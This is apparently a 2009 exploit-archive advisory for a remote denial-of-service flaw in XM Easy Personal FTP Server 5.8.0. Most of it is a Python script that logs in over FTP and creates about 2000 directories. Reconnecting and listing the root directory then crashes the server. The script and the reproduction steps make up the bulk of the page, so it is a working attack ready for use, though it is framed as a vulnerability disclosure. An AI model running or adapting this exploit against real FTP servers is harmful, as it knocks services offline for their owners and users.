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XM Easy Personal FTP Server 5.8.0 Denial Of Service

XM Easy Personal FTP Server 5.8.0 Denial Of Service
Posted Nov 24, 2009
Authored by leinakesi

XM Easy Personal FTP Server version 5.8.0 remote denial of service exploit.

tags | exploit, remote, denial of service
MD5 | eca98c2ae9525d89ac533c6fee213434

XM Easy Personal FTP Server 5.8.0 Denial Of Service

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Date of Discovery: 24-Nov-2009

Credits:leinakesi[at]gmail.com

Vendor: Dxmsoft
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Affected:

XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
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Overview:

XM Easy Personal FTP Server failed to handle more than 2000 files or folders in

the root directory.
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Details:

if you could log on the server, take the following steps and the server will

crash which lead to DoS.

1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
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Exploit example:

1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys

def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string='a'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)

for i in range(1,200):
sock.send("mkd " + "a" * i +"\r\n")
print "[-] " + ("mkd " + "a" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "b" * i +"\r\n")
print "[-] " + ("mkd " + "b" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "c" * i +"\r\n")
print "[-] " + ("mkd " + "c" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "d" * i +"\r\n")
print "[-] " + ("mkd " + "d" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "e" * i +"\r\n")
print "[-] " + ("mkd " + "e" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "f" * i +"\r\n")
print "[-] " + ("mkd " + "f" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "g" * i +"\r\n")
print "[-] " + ("mkd " + "g" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "h" * i +"\r\n")
print "[-] " + ("mkd " + "h" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "i" * i +"\r\n")
print "[-] " + ("mkd " + "i" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "j" * i +"\r\n")
print "[-] " + ("mkd " + "j" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"

sock.close()
sys.exit(0);

2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir




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